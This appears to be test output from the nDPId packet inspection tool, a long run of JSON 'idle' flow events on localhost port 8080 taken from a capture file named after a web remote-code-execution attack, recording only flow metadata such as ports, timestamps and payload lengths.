+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":639,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277725,"flow_last_seen":1576420277725,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277727,"flow_last_seen":1576420277727,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":641,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277729,"flow_last_seen":1576420277729,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277730,"flow_last_seen":1576420277730,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277732,"flow_last_seen":1576420277732,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277734,"flow_last_seen":1576420277734,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277736,"flow_last_seen":1576420277736,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277737,"flow_last_seen":1576420277737,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277739,"flow_last_seen":1576420277739,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277741,"flow_last_seen":1576420277741,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277743,"flow_last_seen":1576420277743,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7560000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7560000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7560000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7560000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7560000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7560000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 